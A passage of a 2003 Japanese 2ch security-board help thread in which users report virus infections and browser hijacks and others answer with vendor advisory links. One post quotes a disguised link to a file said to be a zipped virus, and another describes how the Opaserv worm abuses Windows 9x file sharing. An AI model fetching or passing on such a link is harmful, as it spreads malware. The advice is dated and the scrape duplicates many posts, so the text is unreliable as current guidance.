http://ex.2ch.net/test/read.cgi/entrance/1049084572/l50か、
ダウソ板http://tmp.2ch.net/download/へ。
>>614
マルチポスト、荒らし依頼。氏ね。
http://pc.2ch.net/test/read.cgi/sec/1000252846/114
この板では鑑定はやらないし、ファイル名だけで危険かどうか分かりません。
http://ex.2ch.net/test/read.cgi/entrance/1049084572/l50か、
ダウソ板http://tmp.2ch.net/download/へ。
>>614
マルチポスト、荒らし依頼。氏ね。
http://pc.2ch.net/test/read.cgi/sec/1000252846/114
616 :名無しさん@お腹いっぱい。:03/04/01 15:51
age
617 :名無しさん@お腹いっぱい。:03/04/01 15:56
618 :名無しさん@お腹いっぱい。:03/04/01 18:04
Redlof.Aってやばいですか?
619 :名無しさん@お腹いっぱい。:03/04/01 18:18
>>618
検索&過去ログ参照
検索&過去ログ参照
620 :名無しさん@お腹いっぱい。:03/04/01 21:50
おまえら全員死ね
621 :名無しさん@お腹いっぱい。:03/04/01 21:50
VBS_REDLOF.Aとやらのウィルスにやられまくってる。
ファイルを開いてもまっしろや。 検索したらでるんやけど;
ウィルスバスターとか系で駆除できまつ?
ファイルを開いてもまっしろや。 検索したらでるんやけど;
ウィルスバスターとか系で駆除できまつ?
622 :名無しさん@お腹いっぱい。:03/04/01 22:14
623 :名無しさん@お腹いっぱい。:03/04/01 22:34
レジストリエディタ???
624 :名無しさん@お腹いっぱい。:03/04/02 00:40
>>623
レジストリ・・・
レジストリ・・・
625 :名無しさん@お腹いっぱい。:03/04/02 12:12
最近140KB前後のやたら重いメールが来るんですが、これって何ですか?
添付ファイルは無いです。題名はどれも英文です。
一度、ケータイからそれを空けたら中身真っ白でした。
教えて下さい。
一日に5件以上入ってきて困ってます。
添付ファイルは無いです。題名はどれも英文です。
一度、ケータイからそれを空けたら中身真っ白でした。
教えて下さい。
一日に5件以上入ってきて困ってます。
626 :名無しさん@お腹いっぱい。:03/04/02 12:36
627 :名無しさん@お腹いっぱい。:03/04/02 20:13
628 :名無しさん@お腹いっぱい。:03/04/02 21:16
age
629 :名無しさん@お腹いっぱい。:03/04/02 21:21
これウィルスかどうか分からないんだけど、
パソコン起動したらデスクトップの左下に
必ず小さいxxxsexって書かれたタイトルバー
だけのウィンドウが出ます。
で、IE6を起動すると 必ずロリータリンクページ
が出て、ホームぺージ の設定を消去しても、
次の起動にはまた必ず ロリータページが
ホームページになってます。
で、偶にlovesexっていう ページが出て、変な二つの
プログラムをダウンロード しろと出ます。
で、あるページにリンクすると、3回に一回の割合で
変なサーチエンジンの ページに飛びます。
一体何なのでしょうかね?
パソコン起動したらデスクトップの左下に
必ず小さいxxxsexって書かれたタイトルバー
だけのウィンドウが出ます。
で、IE6を起動すると 必ずロリータリンクページ
が出て、ホームぺージ の設定を消去しても、
次の起動にはまた必ず ロリータページが
ホームページになってます。
で、偶にlovesexっていう ページが出て、変な二つの
プログラムをダウンロード しろと出ます。
で、あるページにリンクすると、3回に一回の割合で
変なサーチエンジンの ページに飛びます。
一体何なのでしょうかね?
630 :名無しさん@お腹いっぱい。:03/04/02 21:31
毎回起動時にAVGから警告で
virus
Trojan horse MusicSearch
と表示されますが
スキャンにかけても何も反応しません。
オンラインスキャンも無反応でした。
OSはXPでWindowsUPDATEは最新です。
見つかる場所は
E:\Documents and Settings\Administrator\Local Settings\Temp
で、実行ファイルなのですがそのようなファイルは隠しファイルにすらありませんでした。
海外では似た事例が起きているようですが
検索しても今ひとつ解決策が見つかりません。
どうか助けて下さい。
virus
Trojan horse MusicSearch
と表示されますが
スキャンにかけても何も反応しません。
オンラインスキャンも無反応でした。
OSはXPでWindowsUPDATEは最新です。
見つかる場所は
E:\Documents and Settings\Administrator\Local Settings\Temp
で、実行ファイルなのですがそのようなファイルは隠しファイルにすらありませんでした。
海外では似た事例が起きているようですが
検索しても今ひとつ解決策が見つかりません。
どうか助けて下さい。
631 :名無しさん@お腹いっぱい。:03/04/02 22:39
トロイって画像等をダウンロードしただけで感染しますか?
それとも実行しなければ問題ないですか?
ブラクラ(グロ)間違ってDLしちゃったんです。
それとも実行しなければ問題ないですか?
ブラクラ(グロ)間違ってDLしちゃったんです。
632 :名無しさん@お腹いっぱい。:03/04/02 23:07
すみません、お力をお借りします。当方WinMe/IE6/ウィルスバスターです。
tp://www.geocities.co.jp/Bookend-Yasunari/8114/niki.txt
上のアドレスを踏んでしまい、妙なテキストファイルが出てきました。
鑑定スレでは
764 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 21:12 ID:???
>>752
これは、txtは擬装で、本当はzipファイルです。
ただし、解凍しても出てくるのはウイルスですから、解凍しない方が良いでしょぅ。
イキストファイルだと思って踏んでいるのであれば、ウイルスに感染する事はありません。
と聞き、急いで全ドライブスキャンを実行しました。
結果、「ZK_900-C」と「___」というふたつのファイルが検出され、駆除されたと出ました。
検出場所はどちらもインターネットテンポラリフォルダ内で、念のためスキャンが終わったあと
キャッシュクリアもしましたが、一つフォルダが残っているようなのです。
また、「ZK_900-C」の方は「chopin\CHOPIN.COM」という よくわからないドライブ名が検索ログに残っています。
tp://www.geocities.co.jp/Bookend-Yasunari/8114/niki.txt
上のアドレスを踏んでしまい、妙なテキストファイルが出てきました。
鑑定スレでは
764 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 21:12 ID:???
>>752
これは、txtは擬装で、本当はzipファイルです。
ただし、解凍しても出てくるのはウイルスですから、解凍しない方が良いでしょぅ。
イキストファイルだと思って踏んでいるのであれば、ウイルスに感染する事はありません。
と聞き、急いで全ドライブスキャンを実行しました。
結果、「ZK_900-C」と「___」というふたつのファイルが検出され、駆除されたと出ました。
検出場所はどちらもインターネットテンポラリフォルダ内で、念のためスキャンが終わったあと
キャッシュクリアもしましたが、一つフォルダが残っているようなのです。
また、「ZK_900-C」の方は「chopin\CHOPIN.COM」という よくわからないドライブ名が検索ログに残っています。
633 :名無しさん@お腹いっぱい。:03/04/02 23:07
107 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 22:06 ID:???
>>106
NPox900というウイルスだと、ノートンアンチウイルスは警告しました。
と聞いたのでトレンドマイクロ、シマンテックのウィルスデータベースで「ZK_900-C」「NPox900」双方を検索しましたが
情報はヒットせず、不安でたまりません。
110 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 22:11 ID:???
>>109
申し訳ありませんが、ウイルスについては当方はくわしくないので分かりません。
という事なのでそれ以上立ち入った事を聞くわけにもいかず、こちらに力を借りに来ました。
質問したいことは
・「ZK_900-C」「NPox900」というのはどんなウィルスなのか
・フォルダが残ってる理由(推測でいいです)
・この状況で安心していて大丈夫なのか
・「chopin\CHOPIN.COM」というドライブ名について
以上です。よろしくお願いします。長くなってしまいすみませんでした。
>>106
NPox900というウイルスだと、ノートンアンチウイルスは警告しました。
と聞いたのでトレンドマイクロ、シマンテックのウィルスデータベースで「ZK_900-C」「NPox900」双方を検索しましたが
情報はヒットせず、不安でたまりません。
110 名前:弱気 ◆4eElder1FQ 投稿日:03/04/02 22:11 ID:???
>>109
申し訳ありませんが、ウイルスについては当方はくわしくないので分かりません。
という事なのでそれ以上立ち入った事を聞くわけにもいかず、こちらに力を借りに来ました。
質問したいことは
・「ZK_900-C」「NPox900」というのはどんなウィルスなのか
・フォルダが残ってる理由(推測でいいです)
・この状況で安心していて大丈夫なのか
・「chopin\CHOPIN.COM」というドライブ名について
以上です。よろしくお願いします。長くなってしまいすみませんでした。
634 :名無しさん@お腹いっぱい。:03/04/02 23:08
先にぼるじょあスレに行ったら「ここはネタスレですから」ということで
こちらに来ました。ごめんなさい…
こちらに来ました。ごめんなさい…
635 :名無しさん@お腹いっぱい。:03/04/02 23:12
質問はageで。
636 :名無しさん@お腹いっぱい。:03/04/02 23:21
>>632-634
さっき質問したぼるじょあスレでちょっとレスついてたよ
マルチっていえばマルチだけど、ちゃんと誘導されてるし
まぁいいかなと思う、しかもぼるじょあだし・・・
ぼるじょあ(・3・)質問箱 セキュ板出張所3
http://pc.2ch.net/test/read.cgi/sec/1046969359/893
トレンドマイクロのオンラインスキャンでもしてみればどうかな?
>>1からちょっと読んでみてちょ
さっき質問したぼるじょあスレでちょっとレスついてたよ
マルチっていえばマルチだけど、ちゃんと誘導されてるし
まぁいいかなと思う、しかもぼるじょあだし・・・
ぼるじょあ(・3・)質問箱 セキュ板出張所3
http://pc.2ch.net/test/read.cgi/sec/1046969359/893
トレンドマイクロのオンラインスキャンでもしてみればどうかな?
>>1からちょっと読んでみてちょ
637 :名無しさん@お腹いっぱい。:03/04/02 23:36
>>636
わかりました…再びごめんなさい。
わかりました…再びごめんなさい。
638 :名無しさん@お腹いっぱい。:03/04/03 04:07
>>637
これじゃない?
ttp://www.nai.com/japan/virusinfo/virNdos.asp?v=NPox
ttp://www.nai.com/japan/virusinfo/virXYZdos.asp?v=ZK900
これじゃない?
ttp://www.nai.com/japan/virusinfo/virNdos.asp?v=NPox
ttp://www.nai.com/japan/virusinfo/virXYZdos.asp?v=ZK900
あ、ごめん
>>636のスレで既出みたいだね
>>636のスレで既出みたいだね
640 :名無しさん@お腹いっぱい。:03/04/03 09:08
age
641 :名無しさん@お腹いっぱい。:03/04/03 13:20
age
642 :HLLW.Cult:03/04/03 15:50
W32.HLLW.Cult.C@mm
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
W32.HLLW.Cult.B@mm
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://securityresponse.symantec.com/avcenter/venc/data/[email protected]
W32.HLLW.Cult.B@mm
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
643 :名無しさん@お腹いっぱい。:03/04/03 16:15
Attacked port 25 smtp 上昇中
http://isc.incidents.org/
http://isc.incidents.org/
644 :名無しさん@お腹いっぱい。:03/04/03 17:04
はじめまして。
98を使ってるんですが、最近ネットをして数時間経つと
ページが表示できなくなります。
バスターに反応なし、spybot等で怪しいものを削除もしてみました。
それでもやはり、同じ現象が起きるんです。
で、今気づいたんですがスタートメニューのお気に入りファイルに
青い米印のようなマークがついてるんです…あと終了のパソマークの画面にも…
これってウイルスなんでしょうか?
もう頻繁にフリーズしたり、ビジー状態のエラーがでるので
換え時かとは思うんですが、諸事情により今はまだこのまま使用するつもりです。
何か対策等ありましたらよろしくお願いします。
長文失礼しました。
ぼるじょあさんのとこにいったんですけど、マジレス希望はこちらへとの
ことでしたので、お伺いしました。
98を使ってるんですが、最近ネットをして数時間経つと
ページが表示できなくなります。
バスターに反応なし、spybot等で怪しいものを削除もしてみました。
それでもやはり、同じ現象が起きるんです。
で、今気づいたんですがスタートメニューのお気に入りファイルに
青い米印のようなマークがついてるんです…あと終了のパソマークの画面にも…
これってウイルスなんでしょうか?
もう頻繁にフリーズしたり、ビジー状態のエラーがでるので
換え時かとは思うんですが、諸事情により今はまだこのまま使用するつもりです。
何か対策等ありましたらよろしくお願いします。
長文失礼しました。
ぼるじょあさんのとこにいったんですけど、マジレス希望はこちらへとの
ことでしたので、お伺いしました。
645 :名無しさん@お腹いっぱい。:03/04/03 17:07
>>644
マルチ氏ね。
マルチ氏ね。
646 :名無しさん@お腹いっぱい。:03/04/03 17:08
チャットをしてるとよく荒らしがきてあらしていくんですが・・・
なんかタグを使ってるらしくていっつPCが逝きます。
どなたかそんな攻撃を無効にする方法しりませんか?
あったら是非教えてください、お願いします。
ちなみにPCはWindowsです。
なんかタグを使ってるらしくていっつPCが逝きます。
どなたかそんな攻撃を無効にする方法しりませんか?
あったら是非教えてください、お願いします。
ちなみにPCはWindowsです。
647 :ぼるじょあ ◆yBEncckFOU :03/04/03 17:09
( ・3・)オヨヨ まるてぃはしちゃいけないんですYO
648 :名無しさん@お腹いっぱい。:03/04/03 17:09
649 :名無しさん@お腹いっぱい。:03/04/03 17:11
650 :名無しさん@お腹いっぱい。:03/04/03 17:15
651 :644:03/04/03 17:22
>>649
リソースってシステムリソースってやつですか?
今調べたら、48%の空きとなってました。
>>648
やっぱりそうですよね…ただ仕事で使用しているものなので
ちょっと躊躇してます(インストやったことないので)
>>647
マルチすいませんでした
リソースってシステムリソースってやつですか?
今調べたら、48%の空きとなってました。
>>648
やっぱりそうですよね…ただ仕事で使用しているものなので
ちょっと躊躇してます(インストやったことないので)
>>647
マルチすいませんでした
652 :名無しさん@お腹いっぱい。:03/04/03 17:27
スイマセン。質問です。
友達から添付ファイル付きの変なメールが着てると言われたので
アドレスを教えてもらったら、自分の会社のアドレスでした。
会社で送信済みフォルダを調べたところそんな形跡はありませんでした。
そして添付ファイルは2ちゃんのとあるスレでHTML形式でした。
しかも、会社には友達のメアドは登録してませんし、2ちゃんは見れないのです。
これは一体どういう事なのでしょうか?
申し訳ありませんが分かる方、教えてください。
友達から添付ファイル付きの変なメールが着てると言われたので
アドレスを教えてもらったら、自分の会社のアドレスでした。
会社で送信済みフォルダを調べたところそんな形跡はありませんでした。
そして添付ファイルは2ちゃんのとあるスレでHTML形式でした。
しかも、会社には友達のメアドは登録してませんし、2ちゃんは見れないのです。
これは一体どういう事なのでしょうか?
申し訳ありませんが分かる方、教えてください。
653 :名無しさん@お腹いっぱい。:03/04/03 17:38
654 :名無しさん@お腹いっぱい。:03/04/03 17:56
>>652
いまどきこんな認識のヤシがまだ居るんだなぁ…
・ウィルスは差出人を偽装することがある。
http://www.nai.com/japan/virusinfo/viruscartoon.asp?ViruGazoMokujiNo=2
・ウィルスはメーラを使わずに独自のSMTPを使うことが多いので、
メーラに送信ログは残らない。
・ウィルスは感染者のHDDから適当なファイルを添付して送ることがある。
何というウィルスか分からないと、抽象的に答えることしかできない。
アンチウィルスソフト常駐させとけよ。
いまどきこんな認識のヤシがまだ居るんだなぁ…
・ウィルスは差出人を偽装することがある。
http://www.nai.com/japan/virusinfo/viruscartoon.asp?ViruGazoMokujiNo=2
・ウィルスはメーラを使わずに独自のSMTPを使うことが多いので、
メーラに送信ログは残らない。
・ウィルスは感染者のHDDから適当なファイルを添付して送ることがある。
何というウィルスか分からないと、抽象的に答えることしかできない。
アンチウィルスソフト常駐させとけよ。
655 :名無しさん@お腹いっぱい。:03/04/03 18:16
656 :名無しさん@お腹いっぱい。:03/04/03 18:19
「ウイルスに狙われるファイル共有サービス,設定を見直せ」――IPAが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030403/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030403/1/
みなさん。レスありがとうございます。
自分があまりにも無知でした。
セキュリティソフト購入します。
ノートンのアンチウィルスとインターネットセキュリティ
のどちらかの購入を考えてまが、迷います。
やはりインターネットセキュリティを買った方が無難で
しょうか?
質問ばっかでスイマセン。
自分があまりにも無知でした。
セキュリティソフト購入します。
ノートンのアンチウィルスとインターネットセキュリティ
のどちらかの購入を考えてまが、迷います。
やはりインターネットセキュリティを買った方が無難で
しょうか?
質問ばっかでスイマセン。
658 :名無しさん@お腹いっぱい。:03/04/03 18:57
さっそくレスありがとうございます。
PCは少し前に買ったのでスペック的には問題ないと
思います。
NISとアンチウィルスの違いってNISにはアンチウィルス以外の機能が
あって、アンチウィルスにはその機能しかないって事ですか?
PCは少し前に買ったのでスペック的には問題ないと
思います。
NISとアンチウィルスの違いってNISにはアンチウィルス以外の機能が
あって、アンチウィルスにはその機能しかないって事ですか?
660 :名無しさん@お腹いっぱい。:03/04/03 19:06
>>659
NISにはファイヤーウォールと保護者機能(エログロサイト抑制)がNAVに追加されてる、
つーかノートンスレhttp://pc.2ch.net/test/read.cgi/sec/1048433756/l50と
シマンテックのサイトhttp://www.symantec.com/region/jp/見てくれよ。
NISにはファイヤーウォールと保護者機能(エログロサイト抑制)がNAVに追加されてる、
つーかノートンスレhttp://pc.2ch.net/test/read.cgi/sec/1048433756/l50と
シマンテックのサイトhttp://www.symantec.com/region/jp/見てくれよ。
662 :名無しさん@お腹いっぱい。:03/04/03 19:56
W32.Opaserv.G.Worm について進入経路をご存知の方、情報下さい。
今朝会社に来てみたら10台ぐらいのWin95/98PCがOpaservを検知しておりました。
各PCにはNorton Antivirus Copration Edition が導入されています。
インターネット接続は限られたPCにしか許可していませんし、FWで必要なもの(開いているのはwebとメールぐらい)以外のポートは閉じてあります。
しかし進入されてしまいました。
おそらく何台かに接続されているAirH"からの進入だと思うのですが、駆除ツールを使って感染しているPCを探しましたが見つかりませんでした。
Symantecのサイト見るとファイル共有から感染すると書かれていますが、これはポート137-139を閉じれば防げますでしょうか?
それともまったく別の方法で進入されているのでしょうか?
ご存知の方、よろしくお願いいたします。
(文章めちゃめちゃで済みません)
今朝会社に来てみたら10台ぐらいのWin95/98PCがOpaservを検知しておりました。
各PCにはNorton Antivirus Copration Edition が導入されています。
インターネット接続は限られたPCにしか許可していませんし、FWで必要なもの(開いているのはwebとメールぐらい)以外のポートは閉じてあります。
しかし進入されてしまいました。
おそらく何台かに接続されているAirH"からの進入だと思うのですが、駆除ツールを使って感染しているPCを探しましたが見つかりませんでした。
Symantecのサイト見るとファイル共有から感染すると書かれていますが、これはポート137-139を閉じれば防げますでしょうか?
それともまったく別の方法で進入されているのでしょうか?
ご存知の方、よろしくお願いいたします。
(文章めちゃめちゃで済みません)
663 :名無しさん@お腹いっぱい。:03/04/03 20:01
>>662ちゃんと書いてある。
http://www.symantec.com/region/jp/sarcj/data/w/w32.opaserv.g.worm.html
このワームはMicrosoft Windows 95/98/Meのセキュリティ上の脆弱性を利用します。ワームは1文字のパ
スワードをネットワーク共有に送信することで、Windows 95/98/Meのファイル共有に割り当てられているパ
スワード全部を知らなくても、そのファイル共有にアクセスできるようにします。この脆弱性の影響を受けるシ
ステムはWindows 95/98/Meです。
上記のOSを稼動しているコンピュータ用の修正プログラムは、下記ページからダウンロードいただけます。
http://www.microsoft.com/japan/technet/security/bulletin/MS00-072.asp
上記OSをお使いの方でまだ修正プログラムを適用していないお客様は、必ず修正プログラムを適用して今
後の感染を防止してください。
http://www.symantec.com/region/jp/sarcj/data/w/w32.opaserv.g.worm.html
このワームはMicrosoft Windows 95/98/Meのセキュリティ上の脆弱性を利用します。ワームは1文字のパ
スワードをネットワーク共有に送信することで、Windows 95/98/Meのファイル共有に割り当てられているパ
スワード全部を知らなくても、そのファイル共有にアクセスできるようにします。この脆弱性の影響を受けるシ
ステムはWindows 95/98/Meです。
上記のOSを稼動しているコンピュータ用の修正プログラムは、下記ページからダウンロードいただけます。
http://www.microsoft.com/japan/technet/security/bulletin/MS00-072.asp
上記OSをお使いの方でまだ修正プログラムを適用していないお客様は、必ず修正プログラムを適用して今
後の感染を防止してください。
665 :名無しさん@お腹いっぱい。:03/04/03 20:58
666 :cheshire-cat ◆CATBCJABLA :03/04/03 21:03
>>629
該当しうるケースが多すぎて、それぞれのレスに対してみんな個別に対処できないんすよ。
http://www.aa.alpha-net.ne.jp/sharkey/startpage.htm
http://www.geocities.co.jp/SiliconValley-SanJose/3220/startpage.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;JP320159
http://home10.highway.ne.jp/junsekai/PQR_top.htm
http://members.tripod.co.jp/tef_tef/trouble/adult.html
http://www95.sakura.ne.jp/~jksg/sub/yakudachi/PC_yakudachi_1.htm
該当しうるケースが多すぎて、それぞれのレスに対してみんな個別に対処できないんすよ。
http://www.aa.alpha-net.ne.jp/sharkey/startpage.htm
http://www.geocities.co.jp/SiliconValley-SanJose/3220/startpage.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;JP320159
http://home10.highway.ne.jp/junsekai/PQR_top.htm
http://members.tripod.co.jp/tef_tef/trouble/adult.html
http://www95.sakura.ne.jp/~jksg/sub/yakudachi/PC_yakudachi_1.htm
667 :>>629:03/04/03 21:08
668 :名無しさん@お腹いっぱい。:03/04/04 03:27
669 :名無しさん@お腹いっぱい。:03/04/04 08:00
age
670 :bloom:03/04/04 09:00
671 :名無しさん@お腹いっぱい。:03/04/04 14:45
age
672 :名無しさん@お腹いっぱい。:03/04/04 15:02
HTML_SAURAに感染しました。
削除はしたのですが今まで見ることが出来たのに見られなくなってしまったファイルが
結構あります。どうすれば直るのでしょうか。
削除はしたのですが今まで見ることが出来たのに見られなくなってしまったファイルが
結構あります。どうすれば直るのでしょうか。
673 :672:03/04/04 15:47
今までデジカメでとった写真とかも全部見られなくなってしまったんですけど
どうしたら良いんですか?
どうしたら良いんですか?
674 :名無しさん@お腹いっぱい。:03/04/04 15:49
>>672-673
検出したウイルス対策ソフト名は何?
検出したウイルス対策ソフト名は何?
675 :672:03/04/04 15:50
ウィルスバスター2002です
676 :名無しさん@お腹いっぱい。:03/04/04 15:52
>>675
「HTML_SAURA」で検出名はあってる?データベースに見つからないんだが・・・・・
「HTML_SAURA」で検出名はあってる?データベースに見つからないんだが・・・・・
677 :672:03/04/04 15:57
HTML_SAUR.A かまたは HTML_SAUR,Aでした
678 :672:03/04/04 16:02
間違ってました。
HTML_SUAR.Aでした
HTML_SUAR.Aでした
679 :名無しさん@お腹いっぱい。:03/04/04 16:05
>>678
やっと検索に引っかかりました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A
ブラクラなので、検出されたファイルを全て削除すれば大丈夫のはず。
やっと検索に引っかかりました。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A
ブラクラなので、検出されたファイルを全て削除すれば大丈夫のはず。
680 :名無しさん@お腹いっぱい。:03/04/04 16:11
HTML_SUAR.AはHTML文書の中に記述が加えられるものだから、見られなくなったファイルってHTML文書かな?
>特に感染マシン上でファイルコピーやレジストリ改変などのシステム改変は行いません。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A
>特に感染マシン上でファイルコピーやレジストリ改変などのシステム改変は行いません。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A
681 :672:03/04/04 16:13
682 :名無しさん@お腹いっぱい。:03/04/04 16:15
>>681
jpgには影響ないよ。HTML自体はあきらめても、jpg画像だけなら影響を受けてないはずなんだけど。
jpgには影響ないよ。HTML自体はあきらめても、jpg画像だけなら影響を受けてないはずなんだけど。
683 :672:03/04/04 16:16
HTMLファイルとJPGファイルは今までのアイコンとは変わってしまって
ウィンドウズの旗マークになってます。
ウィンドウズの旗マークになってます。
684 :672:03/04/04 16:18
そうですよね。何故こんな事になってしまったのか。
685 :名無しさん@お腹いっぱい。:03/04/04 16:18
686 :名無しさん@お腹いっぱい。:03/04/04 16:20
687 :672:03/04/04 16:25
拡張子もJPGになってるのにファイル形式を特定できませんってでます。
(;;)うう
(;;)うう
688 :672:03/04/04 16:28
縮小表示はできるんですけどどうしてもファイルを開く事が出来ません。
レスいっぱいしてごめんなさい。必死なもので。
レスいっぱいしてごめんなさい。必死なもので。
689 :名無しさん@お腹いっぱい。:03/04/04 16:28
>>687指示されたとおりにやってるのかな。
再起動、もしくはフォルダオプション。
再起動、もしくはフォルダオプション。
690 :名無しさん@お腹いっぱい。:03/04/04 16:30
一方通行みたいなので回答から降ります。あとはどなたかよろしくです。
691 :名無しさん@お腹いっぱい。:03/04/04 16:31
画像の破壊は行なわないウイルス(ウイルスとも呼べないような)なんだが…
692 :名無しさん@お腹いっぱい。:03/04/04 16:37
おーい、いないなら俺も帰るぞ。
ヤフーのJPG画像も駄目なら別問題だな。
ヤフーのJPG画像も駄目なら別問題だな。
693 :672:03/04/04 16:41
すいません。再起動してました。
694 :672:03/04/04 16:42
フォルダオプションをどうすればいいのでしょうか?
695 :名無しさん@お腹いっぱい。:03/04/04 16:51
>>694
その前に、その画像はIEで見れる?
その前に、その画像はIEで見れる?
696 :672:03/04/04 16:59
>>695
今やってみたらIEでは見られました。
それからスタート→プログラム→マイクロソフトオフィスツール→フォトエディター
でやれば見られることに今気付きました。
でもマイドキュメントから開こうとすると出来ません。
今やってみたらIEでは見られました。
それからスタート→プログラム→マイクロソフトオフィスツール→フォトエディター
でやれば見られることに今気付きました。
でもマイドキュメントから開こうとすると出来ません。
697 :名無しさん@お腹いっぱい。:03/04/04 17:03
698 :672:03/04/04 17:14
A10をやって再起動したらHTML文書は見られるようになりました。
ありがとうございました。
でもJPEGは開けないままです。
ありがとうございました。
でもJPEGは開けないままです。
699 :名無しさん@お腹いっぱい。:03/04/04 17:20
マイドキュメントのフォルダ設定をいじってみてください。
設定は画像関連を。
設定は画像関連を。
700 :672:03/04/04 17:52
遅くなってすいません。
いろいろフォルダ設定とかいじって再起動してるんですけどうまくいきません
いろいろフォルダ設定とかいじって再起動してるんですけどうまくいきません
701 :672:03/04/04 18:08
長々とありがとう御座いました。
とりあえずスキャンディスクしてみます。
とりあえずスキャンディスクしてみます。
皆さんありがとうございますた。
半分治りますた。
半分治りますた。
703 :名無しさん@お腹いっぱい。:03/04/05 05:00
このスレには誘導されて来ても「マルチ氏ねマルチ放置」と
まるで機械のようにほざくアフォがいます。
まるで機械のようにほざくアフォがいます。
704 :名無しさん@お腹いっぱい。:03/04/05 07:16
「貴方のPCはウィルスに感染しています。
このツールで駆除しなさい」とウィルスプログラムが付属されていた。
ガクガク。
このツールで駆除しなさい」とウィルスプログラムが付属されていた。
ガクガク。
705 :名無しさん@お腹いっぱい。:03/04/05 13:10
706 :名無しさん@お腹いっぱい。:03/04/05 22:57
age
707 :名無しさん@お腹いっぱい。:03/04/06 20:17
今日、以下のようなヘッダーの件名なし、アドレスなし、
ウィルス添付ファイルあり(HIELPEHI.EXE)のメールが来たんですが、
送り主(相手のプロバイダだけでも)を突き止めることは可能でしょうか?
Date: Sun, 6 Apr 2003 17:49:55 +0900 (JST)
Message-Id: <200304060849伏せますね@mail.伏せますね.co.jp>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="--VEYBW127KDY705"
ウィルス添付ファイルあり(HIELPEHI.EXE)のメールが来たんですが、
送り主(相手のプロバイダだけでも)を突き止めることは可能でしょうか?
Date: Sun, 6 Apr 2003 17:49:55 +0900 (JST)
Message-Id: <200304060849伏せますね@mail.伏せますね.co.jp>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="--VEYBW127KDY705"
708 :名無しさん@お腹いっぱい。:03/04/06 20:26
>>707
日付とContent-Typeだけでわかるわけねーだろカス
日付とContent-Typeだけでわかるわけねーだろカス
709 :名無しさん@お腹いっぱい。:03/04/06 20:31
>707 肝心なアレがない。
710 :707:03/04/06 20:37
>708-709
ヘッダーがこれだけだったんですよ。
漏れも通常のヘッダーなら対処法がわかったんですが…
やっぱりむりですか…
ヘッダーがこれだけだったんですよ。
漏れも通常のヘッダーなら対処法がわかったんですが…
やっぱりむりですか…
711 :名無しさん@お腹いっぱい。:03/04/06 20:45
>>707
自分で自分にメル送ってヘッダみてみ。
自分で自分にメル送ってヘッダみてみ。
712 :名無しさん@お腹いっぱい。:03/04/06 20:52
>711 独自 MTU なんでしょう。きっと。
713 :名無しさん@お腹いっぱい。:03/04/06 20:57
だめだ、寝よ…
×MTU
○MTA
×MTU
○MTA
714 :名無しさん@お腹いっぱい。:03/04/06 20:59
715 :707:03/04/06 20:59
>711-712
すみません、意味がよく解かりません。
それと、このメルアド、受信ONLYのフリーメールアドレスなので
送信できません。
昨日来たウィルスメールは通常のヘッダーだったので
プロバイダに通報できたんですが…(´・ω・`)
すみません、意味がよく解かりません。
それと、このメルアド、受信ONLYのフリーメールアドレスなので
送信できません。
昨日来たウィルスメールは通常のヘッダーだったので
プロバイダに通報できたんですが…(´・ω・`)
716 :ぼるじょあ ◆yBEncckFOU :03/04/06 21:04
(・3・) エェー ボクウイルス入りの添付ファイル付きメールなんて貰った事がないんだがYO
717 :707:03/04/06 21:06
あ、リロードしていなかったら…
でもMTAでも意味が解からなかったり……(´・ω・`)
>714
実は和塩のアドレスなので、
和塩から送られてきたはずはないんですけどねぇ…
なんか変なウィルスメールだと思ったので
ちょっと気になって
でもMTAでも意味が解からなかったり……(´・ω・`)
>714
実は和塩のアドレスなので、
和塩から送られてきたはずはないんですけどねぇ…
なんか変なウィルスメールだと思ったので
ちょっと気になって
718 :名無しさん@お腹いっぱい。:03/04/06 21:37
>718
レスどうも。
いやこのアドレス、サイトで公開しているせいか
殆ど毎日のようにウィルスが…
サイトは1日訪問者が5人くらいの超ピコなんですけどね…
精神力を鍛えます。
レスどうも。
いやこのアドレス、サイトで公開しているせいか
殆ど毎日のようにウィルスが…
サイトは1日訪問者が5人くらいの超ピコなんですけどね…
精神力を鍛えます。
720 :名無しさん@お腹いっぱい。:03/04/06 22:40
721 :質問れす:03/04/07 01:47
ウイルスに感染すると、自分が送ったメールには『必ず』ウイルスつき添付ファイルがつくんでしょうか?
722 :名無しさん@お腹いっぱい。:03/04/07 05:18
んなわけない
ちったぁ勉強しろ
ちったぁ勉強しろ
723 :名無しさん@お腹いっぱい。:03/04/07 08:25
age
>720
レス、Thx!
無料のメールフォームサービスにアドレスを変更して
mailtoを外しました。
レス、Thx!
無料のメールフォームサービスにアドレスを変更して
mailtoを外しました。
725 :質問れす:03/04/07 10:15
それじゃあ、たとえばklezなんかに感染した場合、
アドレス帳に自分のメアドを登録して、インターネットに接続していれば来るんでしょうか?
アドレス帳に自分のメアドを登録して、インターネットに接続していれば来るんでしょうか?
726 :名無しさん@お腹いっぱい。:03/04/07 11:09
>>725
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
http://pc.2ch.net/sec/kako/1021/10211/1021137509.html
http://pc.2ch.net/sec/kako/1024/10242/1024255721.html
http://pc.2ch.net/test/read.cgi/sec/1030175440/
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html
http://pc.2ch.net/sec/kako/1021/10211/1021137509.html
http://pc.2ch.net/sec/kako/1024/10242/1024255721.html
http://pc.2ch.net/test/read.cgi/sec/1030175440/
727 :名無しさん@お腹いっぱい。:03/04/07 13:34
よろしくお願いします。
2CHの実況・スポーツ・MotoGp鈴鹿で、
